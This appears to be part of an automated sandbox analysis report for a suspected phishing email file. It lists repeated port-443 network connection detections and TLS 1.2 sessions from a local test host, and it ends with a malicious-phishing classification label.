Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54204
Source: unknown	Network traffic detected: HTTP traffic on port 56326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 54219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 54211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54219
Source: unknown	Network traffic detected: HTTP traffic on port 56249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54213
Source: unknown	Network traffic detected: HTTP traffic on port 54205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54216
Source: unknown	Network traffic detected: HTTP traffic on port 56290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54220
Source: unknown	Network traffic detected: HTTP traffic on port 54228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54185
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54225
Source: unknown	Network traffic detected: HTTP traffic on port 54220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54222
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56246
Source: unknown	Network traffic detected: HTTP traffic on port 56303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56247
Source: unknown	Network traffic detected: HTTP traffic on port 54202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56249
Source: unknown	Network traffic detected: HTTP traffic on port 56321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54194
Source: unknown	Network traffic detected: HTTP traffic on port 56289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56252
Source: unknown	Network traffic detected: HTTP traffic on port 56318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54190
Source: unknown	Network traffic detected: HTTP traffic on port 54194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56259
Source: unknown	Network traffic detected: HTTP traffic on port 54226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56300
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56263
Source: unknown	Network traffic detected: HTTP traffic on port 54210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56309
Source: unknown	Network traffic detected: HTTP traffic on port 56248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56301
Source: unknown	Network traffic detected: HTTP traffic on port 54204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56303
Source: unknown	Network traffic detected: HTTP traffic on port 54192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56311
Source: unknown	Network traffic detected: HTTP traffic on port 54229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56273
Source: unknown	Network traffic detected: HTTP traffic on port 56245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56316 -> 443

Source: unknown	HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:56244 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.winMSG@64/47@58/275